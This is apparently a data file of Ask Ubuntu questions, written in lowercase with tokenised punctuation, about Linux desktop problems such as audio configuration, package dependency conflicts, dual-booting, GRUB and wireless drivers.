349422	will i have to reinstall applications if i reinstall ubuntu ?	i am new to linux i have a quick question ... i currently have three partitions : / swap /home i have a few related questions : which partition does apt-get install applications to ? ( windows equivalent `` c : \program files '' folder ) if i reinstall ubuntu , will my applications go away and i have to reinstall them , like in windows ? if i were to start from scratch and repartition , which partition should be the bigger partition ( / or /home ? ) if i am installing a lot programs from apt-get command
349427	two microphones listed in the input section of pulseaudio , `` internal microphone '' and `` microphone '' but the problem is that	being on a laptop , ( acer aspire v3-571g to be specific ) ubuntu 13.04 , the `` internal microphone '' port selection , all noise played into the microphone is played back to me through the speakers . being on unity i ca n't control which ports i use without manually opening the pulse audio volume control , and it 's a pain . the 'microphone '' port selection uses the internal and external mic whenever either is plugged in and does not have this issue . i have no more ideas on what to do . pulseaudio -- dump-conf : daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-3.0/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 alternate-sample-rate = 48000 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 amixer -c 0 simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 87 mono : playback 69 [ 79 % ] [ -13.50db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'speaker',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ on ] front right : playback 87 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 36.00db ] front right : 3 [ 100 % ] [ 36.00db ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ off ] simple mixer control 'beep',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 24 [ 77 % ] [ 19.50db ] [ on ] front right : capture 24 [ 77 % ] [ 19.50db ] [ on ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled' simple mixer control 'internal mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'internal mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ] pacmd list-sources welcome to pulseaudio ! use `` help '' for usage information . > > > 2 source ( s ) available . index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo.monitor > driver : < module-alsa-card.c > flags : decibel_volume latency state : idle suspend cause : priority : 1950 volume : 0 : 0 % 1 : 0 % 0 : -inf db 1 : -inf db balance 0.00 base volume : 100 % 0.00 db volume steps : 65537 muted : no current latency : 0.00 ms max rewind : 13 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 fixed latency : 80.00 ms monitor_of : 0 card : 0 < alsa_card.pci-0000_00_1b.0 > module : 4 properties : device.description = `` monitor of built-in audio analogue stereo '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xb3a10000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' * index : 1 name : < alsa_input.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 68 % 1 : 68 % 0 : -9.89 db 1 : -9.89 db balance 0.00 base volume : 8 % -66.00 db volume steps : 65537 muted : no current latency : 0.00 ms max rewind : 0 kib sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 fixed latency : 80.00 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` alc269vb analog '' alsa.id = `` alc269vb analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xb3a10000 irq 45 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 14112 '' device.buffering.fragment_size = `` 1764 '' device.access_mode = `` mmap '' device.profile.name = `` analog-stereo '' device.profile.description = `` analogue stereo '' device.description = `` built-in audio analogue stereo '' alsa.mixer_name = `` intel pantherpoint hdmi '' alsa.components = `` hda:10ec0269,10250647,00100100 hda:80862806,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone-internal : internal microphone ( priority 8900 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-input-microphone '' analog-input-microphone : microphone ( priority 8700 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-input-microphone '' active port : < analog-input-microphone > pacmd dump-volumes welcome to pulseaudio ! use `` help '' for usage information . > > > sink 0 : reference = 0 : 60 % 1 : 60 % , real = 0 : 60 % 1 : 60 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 60 % 1 : 60 % , save = yes input 19 : volume = 0 : 100 % 1 : 100 % , reference_ratio = 0 : 100 % 1 : 100 % , real_ratio = 0 : 100 % 1 : 100 % , soft = 0 : 100 % 1 : 100 % , volume_factor = 0 : 100 % 1 : 100 % , volume_factor_sink = 0 : 100 % 1 : 100 % , save = no source 0 : reference = 0 : 0 % 1 : 0 % , real = 0 : 0 % 1 : 0 % , soft = 0 : 100 % 1 : 100 % , current_hw = 0 : 0 % 1 : 0 % , save = yes source 1 : reference = 0 : 68 % 1 : 68 % , real = 0 : 68 % 1 : 68 % , soft = 0 : 102 % 1 : 102 % , current_hw = 0 : 67 % 1 : 67 % , save = yes pactl info server string : unix : /run/user/liam/pulse/native library protocol version : 27 server protocol version : 27 is local : yes client index : 181 tile size : 65472 user name : liam host name : liam-aspire-v3-571g server name : pulseaudio server version : 3.0 default sample specification : s16le 2ch 44100hz default channel map : front-left , front-right default sink : alsa_output.pci-0000_00_1b.0.analog-stereo default source : alsa_input.pci-0000_00_1b.0.analog-stereo cookie : cccb:95f3
349429	ubuntu-12.04.3-desktop-i386 ( i have downloaded it manually )	please tell me where to put ubuntu-12.04.3-desktop-i386 ( i have downloaded it manually ) i have mounted the ubuntu iso file on f :
349430	compiling code that depends on qt4 with qt5 installed	i have qt5 installed on 12.10 i believe because it is a dependency for the ubuntu sdk and the ubuntu touch tools which i have been using . i have qt4 installed as well , infact i had it installed first . i now need to compile some code for work that uses the qt4 libraries but cmake is complaining -- found unsuitable qt version `` 5.0.2 '' from /usr/bin/qmake even though i am using # find and set up qt find_package ( qt4 ) in the cmake file so i need to find a way to make cmake find qt4 , which i tried and could n't figure out . also , its not my code so i do n't want to have a custom cmake file just for me . because i am a bit short of time i thought that i would just remove qt5 for now and reinstall it later . but when i try to remove it i get the following . i do n't want it to remove all the other packages it says it will ( bottom ) . any advice on either compiling with qt4 or getting rid of qt5 would be appreciated . the following packages will be removed account-plugin-aim account-plugin-facebook account-plugin-flickr account-plugin-google account-plugin-identica account-plugin-jabber account-plugin-salut account-plugin-twitter account-plugin-windows-live account-plugin-yahoo appmenu-qt checkbox-qt cordova-ubuntu-2.8 cordova-ubuntu-2.8-dev cordova-ubuntu-2.8-examples empathy everpad gnome-control-center-signon gwibber-service-facebook gwibber-service-identica gwibber-service-twitter katepart kde-runtime kdelibs-bin kdelibs5-plugins kdoctools kile konsole kubuntu-debug-installer libaccount-plugin-1.0-0 libaccounts-qt1 libattica0.4 libdbusmenu-qt2 libkactivities-bin libkactivities6 libkatepartinterfaces4 libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkonq-common libkonq5abi1 libkparts4 ibkprintutils4 libkpty4 libkrosscore4 libktexteditor4 libkxmlrpcclient4 libnepomuk4 libnepomukcore4abi1 libnepomukquery4a libnepomuksync4 libnepomukutils4 libntrack-qt4-1 libokularcore1abi1 libphonon4 libplasma3 libpolkit-qt-1-1 libpoppler-qt4-4 libpyside1.1 libqapt-runtime libqapt1 libqca2 libqgis1.7.5 libqgsttools-p1 libqimageblitz4 libqjson0 libqt4-core libqt4-dbus libqt4-declarative libqt4-declarative-gestures libqt4-declarative-particles libqt4-designer libqt4-dev libqt4-dev-bin libqt4-gui libqt4-help libqt4-network libqt4-opengl libqt4-opengl-dev libqt4-qt3support libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqt53d5 libqt5clucene5 libqt5concurrent5 libqt5contacts5 libqt5core5 libqt5dbus5 libqt5declarative5 libqt5designer5 libqt5designercomponents5 libqt5feedback5 libqt5gui5 libqt5help5 libqt5location5 libqt5location5-plugins libqt5multimedia5 libqt5multimedia5-plugins libqt5multimediaquick-p5 libqt5multimediawidgets5 ibqt5network5 libqt5opengl5 libqt5opengl5-dev libqt5organizer5 libqt5printsupport5 libqt5qml-graphicaleffects libqt5qml5 libqt5quick5 libqt5quickparticles5 libqt5quicktest5 libqt5script5 libqt5scripttools5 libqt5sensors5 libqt5sql5 libqt5sql5-sqlite libqt5svg5 libqt5svg5-dev libqt5systeminfo5 libqt5test5 libqt5v8-5 libqt5v8-5-dev libqt5versit5 libqt5webkit5 libqt5webkit5-dev libqt5webkit5-qmlwebkitplugin libqt5widgets5 libqt5xml5 libqt5xmlpatterns5 libqt5xmlpatterns5-dev libqtassistantclient4 libqtcore4 libqtgui4 libqtwebkit-dev libqtwebkit4 libqwt5-qt4 libsignon-extension1 libsignon-glib1 libsignon-plugins-common1 libsignon-qt1 libsolid4 libsoprano4 libthreadweaver4 libunity-action-qt1 mcp-account-manager-uoa nautilus-sendto-empathy nepomuk-core okular phonon phonon-backend-gstreamer plasma-scriptengine-javascript pymi pyqt4-dev-tools python-pyside.qtcore python-pyside.qtgui python-pyside.qtnetwork python-pyside.qtwebkit python-qgis python-qt4 python-qt4-dbus qapt-batch qdbus qgis qgis-plugin-grass qgis-providers qmlscene qt-at-spi qt3d5-dev qt4-demos qt4-designer qt4-linguist-tools qt5-default qtbase5-dev qtcreator qtcreator-plugin-ubuntu qtcreator-plugin-ubuntu-cordova qtdeclarative5-cordova-2.8-plugin qtdeclarative5-dev qtdeclarative5-dev-toolsqtdeclarative5-folder listmodel-plugin qtdeclarative5-localstorage-pluginqtdeclarative5-particles-plugin qtdeclarative5-qtaudioengine-plugin qtdeclarative5-qtfeedback-plugin qtdeclarative5-qtmultimedia-plugin qtdeclarative5-qtquick2-plugin qtdeclarative5-qtsensors-plugin qtdeclarative5-ubuntu-ui-toolkit-plugin qtdeclarative5-unity-action-plugin qtdeclarative5-window-plugin qtdeclarative5-xmllistmodel-plugin qtlocation5-dev qtmultimedia5-dev qtscript5-dev qtsensors5-dev qttools5-dev qttools5-dev-tools shotwell signon-keyring-extension signon-plugin-oauth2 signon-plugin-password signon-ui signond sni-qt soprano-daemon spotify-client ubuntu-desktop ubuntu-sdk ubuntu-sso-client-qt ubuntu-ui-toolkit-examples ubuntuone-control-panel-qt unity-scope-gdocs virtualbox-4.2
349433	connection issues on ubuntu 13.04	so i have this tp link adapter ( tl-pa4010 ) and ubuntu finds and connects to the ethernet but it 's so slow ... it feels worst then the dial-up connections back in the days . do you have any idea on how to solve it ? ? thanks in advance
349435	keyboard shortcuts work only in qwerty layout	i am running ubuntu-gnome 13.04 . gnome 3.6 . i have three keyboard layouts : us , dvorak and hindi wx . all the keyboard shortcuts in all categories ( system , windows , etc . ) work only when us layout is selected . except shortcuts that use letters that are mapped to the same key in dvorak and us layout ( a and m ) and shortcuts that do not involve an alphabet . so , super m works and so does alt-control-1 defined in custom category . how can i get the shortcuts to work in all layouts ?
349438	failed to download repository information . error ?	i am new here . i just installed ubuntu and i am very happy . i tried to install a program from ubuntu software center . it said `` available from `` universe '' source '' . so i clicked `` use this source '' . so , the download started . but i have a problem . just after a bit , it gives an error . it says `` failed to download repository information . check your internet connection '' . i was very confused . here are the error details : w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/restricted/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/universe/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/multiverse/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/main/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/restricted/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/universe/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring/multiverse/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/main/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/restricted/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/universe/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/multiverse/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/main/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/restricted/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/universe/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-updates/multiverse/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/main/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/restricted/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/universe/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/multiverse/source/sources 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/main/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/restricted/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/universe/binary-i386/packages 404 not found , w : failed to fetch http : //pk.archive.ubuntu.com/ubuntu/dists/raring-backports/multiverse/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . please help ? : ( i am trying to install 2 programs .
349439	installing touch-coreapps in ubuntu 13.04 results in resolvable dependencies	i am trying to install touc-coreapps on my ubuntu 13.04 installation for testing purposes . i added these ppas sudo add-apt-repository ppa : ubuntu-sdk-team/ppa sudo add-apt-respotiory ppa : ubuntu-touch-coreapps-drivers/daily updated the system , and then tried to install meta-package sudo apt-get install touch-coreapps but that 's what i get reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : touch-coreapps : depends : ubuntu-docviewer-app but it is not going to be installed e : unable to correct problems , you have held broken packages . when trying to install sudo apt-get install ubuntu-docviewer-app i get the following output reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-docviewer-app : depends : qtdeclarative5-poppler-qml-plugin but it is not going to be installed e : unable to correct problems , you have held broken packages . and so on until i reach the point where it asks me to install libpoppler-qt5-1 in which case i get this sudo apt-get install libpoppler-qt5-1 reading package lists ... done building dependency tree reading state information ... done package libpoppler-qt5-1 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libpoppler-qt5-1 ' has no installation candidate googling the issue did n't yield any results apart from this topic on askubuntu which has been asked 22 days ago , but has n't been answered or commented ever since unable to install touch-coreapps on ubuntu 12.10 so i am stuck in the middle of nowhere : ) sure , i could just install apps which do n't cause any dependency errors , but it would be nice to solve this one , for learning purposes . so , any ideas ?
349443	where does the software-center store its history ?	the ubuntu software center is able to display a detailed history of packages installed /updated/removed according to date . where does it get this info from ? ( /var/log/dpkg.log is maintained only for 12 months ; i do n't know of any apt-* or dpkg commands to get the date when a package was first installed . ) how can i copy this data in the form of a table / text to be processed by another program ?
349446	how to re-add windows xp to grub menu after ubuntu 11.10 re-install	basically , i messed up my partitions and decided to do a full re-install of both windows xp and ubuntu 11.10 ( i know that 11.10 is outdated , but i was planning to do an update to 12.04 as soon as i got everything happened ) . here is a sequence of what i did : installed windows xp onto 20gb of hard-drive space installed ubuntu 11.10 onto the remaining 10 gb of space using the advance setup option where i partitioned : ( 1gb swap , 200mb /boot , and 8.8gb / , ( see screenshot ) ) trouble struck , when i rebooted , grub2 did n't show windows xp under my boot options . i ran sudo update-grub but it still did n't find windows i opened gparted and added the 'boot ' flag to my windows xp partition ( i was getting desperate and did n't know what to do ) and now , i 'm stuck with only ubuntu , and i do n't want to have to re-install both ubuntu and windows to get grub working again . please note , i have seen how to boot windows xp ( no grub menu is shown ) ? and add windows to my boot menu but i could n't find anything useful . thanks a lot , devnewb
349451	how to dual-boot ubuntu-touch with android	i have been following the progress of the ubuntu-touch , mostly via blog posts , and youtube ( am loving every video of it ) . but , as far as i can tell , popular apps like whatsapp , viber , etc ... are yet to be ported to the ubuntu-touch . apps like whosthere ( whatsapp replacement ) has been discontinued . question : how can i dual-boot android with the ubuntu-touch . note : i 'm using samsung galaxy s2 as my main phone .
349452	my pc is not booting the pen drive containing ubuntu	my pc is not booting with the pen drive containing ubuntu . i used unetbootin to create the pen .
349455	intel xeon e3-1200 v3/4th graphics card not running 3d	hello ubuntu community .. i have a new motherboard which is gigabyte z87x and has a graphics card vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) after i installed ubuntu i found that i am not running unity 3d when i tested the unity support i got this configuration not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no i am not sure how can i solve this problem i googled and i found out that i should try to run the kernel with nomodeset configuration as they said it works the best with intel cards . i tried and reboot the kernel with modeset configuration but not help at all .. could anyone help me ? ?
349458	my minilaptop on but not start the bios or hard drive	translated using google translate . greetings , i tell them i 'm new using ubuntu just yesterday i installed ubuntu 13.14 , i created three partitions , one primary exchange via air with 2 gb , another primary to install ubuntu with 15 gb and a logic for / home , i installed it , i ran and all , after switching on the commands run sudo apt-get update and sudo apt-get upgrade and all good , but then do not let me install more software from the terminal , so i returned to closed session and logging of the screen after that was put in black and black with a series of codes so pincher shutdown , and relit but never gave me loggin window so i went back to force a shutdown , after that the power led is the only light ie no led lights hard disk or display the bios , if they could make me suggestions to solve the problem is the most grateful . my laptop is a eee pc 1005hab .
349461	how to make a cmpact disc copy protected without using any third party softwares	i 'm developed a new application and i want to write it as autorun cd . i know the way of creating autorun cd , but did n't know how to copy protected that cd . i refer google , but all answers said that use third party software , is there any way to do it ubuntu internally ?
349464	minimise button gone	this is really weird . i just followed this tutorial : http : //ubuntuportal.com/2012/05/install-elementary-desktop-environment-in-ubuntu-12-04-lts.html and it did n't work . my computer is all back to normal apart from the fact i have no minimise button . yes i have searched but everyone is complaining about all the buttons . this is literally just minimise . close is on the left , maximise is on the right and there is nothing else .
349470	no commit option for updated files in rabbitvcs ubuntu	i am using ubuntu 10.04 .i can check in and check out files from svn . but could not commit files one by one . only folder wise commit is possible . `` commit '' option does not show on files after updating it . do you know any workaround on this..
349472	toshiba satellite l75d-a283 unable to find wifi	i 've tried a number of different linux distros . but none of them realize that my toshiba satellite l75d-a283 has a wireless chip . what 's going on ?
349473	how can i make simplewelcome/rosa launcher plasmoid appear on top of other windows ?	when i start the launcher , it appears behind other windows , just like a general plasmoid . can i put it on the top ? thanks !
349474	dual boot option not appearing during startup	i have made my laptop dual boot with windows 7 and ubuntu 12.04 by partitioning my hard disk . the installation of ubuntu has happened perfectly but unfortunately when i switch on may laptop boot option does n't get loaded and windows straight away loads . please help ! !
349475	ping rtt time display precision	on my ubuntu server 13.04 when i 'm pinging another network entity i need to have result with higher precision of rtt time , e.g . : 64 bytes from 10.10.10.2 : icmp_seq=962 ttl=62 time=18.467 ms while right now i have : 64 bytes from 10.10.10.2 : icmp_seq=962 ttl=62 time=18.5 ms how can i change this ? i apologize , i 'm a total newbie i agree . it 's urgent for me however , and i did n't know how to explicitly google it . regards .
349478	how to install driver wireless at ubuntu	how do i install my wireless driver at ubuntu 12.10 ? this is my driver : $ lspci | grep wireless 06:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) thanks
349479	error during installation from try ubuntu	i 'm currently using windows 8 64-bit os and i want to use ubuntu alongside it . but while i try to install , i 'm always stuck on an error message no root file system defined i 've even tried to use gpart but i 've no idea what to do there . i 'm completely new to ubuntu and linux . i do n't want to lose windows or any of my data . i 've a 20 gb partition which i 've thought of using to install ubuntu . any help would be highly appreciated !
349480	giving command to particular usb port	i want to execute adb command from terminal . but i am unable to use adb -s < android_id > *command* since all the devices have same android_id . is it possible to execute adb command on particular usb port . output of lspci -nn | grep usb : *00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) * now i want to fire adb command only on usb port 00:14.0 is it possible to do so ?
349485	remaping keys : capslock to escape and viceversa in ubuntu 13.10	i just installed ubuntu 13.10 and miss the feature to swap the escape and caps lock key . it used to be possible through a gui in ubuntu 12.04 . anyone know how i can solve this ? thanks for the help : )
349486	can`t update ubuntu 12.04lts headless server via terminal	i previously tried to update to 3.2.0.36-linux-generic but this was broken for some reason so every time i restart my server i have to boot 3.2.0.35-linux-generic . when i try sudo apt-get upgrade i get : reading package lists ... done building dependency tree reading state information ... done you might want to run ‘apt-get -f install’ to correct these . the following packages have unmet dependencies . linux-server : depends : linux-headers-server ( = 3.2.0.36.43 ) but 3.2.0.53.63 is installed e : unmet dependencies . try using -f. when trying sudo apt-get -f install i get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.2.0-53-generic linux-image-server linux-server suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed linux-image-3.2.0-53-generic the following packages will be upgraded : linux-image-server linux-server 2 upgraded , 1 newly installed , 0 to remove and 357 not upgraded . 8 not fully installed or removed . need to get 0 b/38.6 mb of archives . after this operation , 150 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 420239 files and directories currently installed . ) unpacking linux-image-3.2.0-53-generic ( from ... /linux-image-3.2.0-53-generic_3.2.0-53.81_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-53-generic_3.2.0-53.81_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./boot/config-3.2.0-53-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-53-generic /boot/vmlinuz-3.2.0-53-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-53-generic /boot/vmlinuz-3.2.0-53-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-53-generic_3.2.0-53.81_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried removing kernels to free space on boot device but when trying sudo apt-get autoremove i get : reading package lists ... done building dependency tree reading state information ... done you might want to run ‘apt-get -f install’ to correct these . the following packages have unmet dependencies . linux-server : depends : linux-headers-server ( = 3.2.0.36.43 ) but 3.2.0.53.63 is installed e : unmet dependencies . try using -f .
349489	is it safe to dual boot ?	i used to use ubuntu on an old laptop a few years ago , now that laptop is dead , and i want linux for developing ( windows does n't really like python ) , so i 'm considering dual booting on my main computer ( alienware x51 , windows 8 uefi ) . i do n't want to touch the windows partition with linux ( all my important data is on an external hdd anyways ) , but i 'm wondering , is there a good chance the windows partition will be corrupted ? in other words , is it safe ? i do n't have a windows reinstall disc ( they do n't come with new computers anymore ) , so it 'd be impossible to reinstall it outside of piracy . if it matters , i 'll be installing xubuntu ( i prefer that over unity ) .
349493	ubuntu not starting after installation with encrypted partition	english translation ( using google translator ) : the following error message appears during the boot process : the drive for /dev/mapper/cryptswap1 is not ready yet or not yet available wait continues , jump over the hanging with `` s '' or lead a manual recovery with `` m '' . no matter what i do , the monitor is black and after about 14 seconds comes a sound . ( whether i 'm doing nothing or `` s '' or `` m '' press . i 've also installed several times and always get the same error message ( the image burned to dvd or usb stick ) there was one exception . the first attempt to install ubuntu alongside win8 worked the start of the bs .
349494	oracle java ( jdk ) repository	we are going to use java on an ubuntu 12.04 server , with up to date repositories . does oracle itself provide any ( ppa ) repositories , and is there any other stable and secure developers providing them ?
349496	libre office base	i want to connect to ms-sql database 2012 using libre office how can i do it i have already installed all the extensions related to libre office base for ms-sql database 2012 or any other application that i can use to do so .
349503	any updates on disabling middle-click paste ?	i 'm using the middle mouse button on my thinkpad with ubuntu to scroll and i 'm pasting a lot of text in my documents by accident which is very annoying and i often end up with messed up documents . i searched on the internet how to disable this feature . the only quick solution i 've found is to execute xmodmap -e `` pointer = 1 25 3 4 5 6 7 8 9 '' in the konsole or for a persistent change to put pointer = 1 25 3 4 5 6 7 8 9 in the ~/.xmodmap file . so the middle butten gets remapped to another button . this works fine for me , but now i can not use use the middle mouse button for anything else -- -especially not for my beloved feature of opening new tabs in firefox by middle-clicking . or just anything else ... apart from directly patching the gtk i was not able to find anything else . does someone know a more elegant way to disbale the middle-click-paste functionality in ubuntu ? my system : thinkpad-r61 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:54:42 utc 2013 i686 i686 i686 gnu/linux
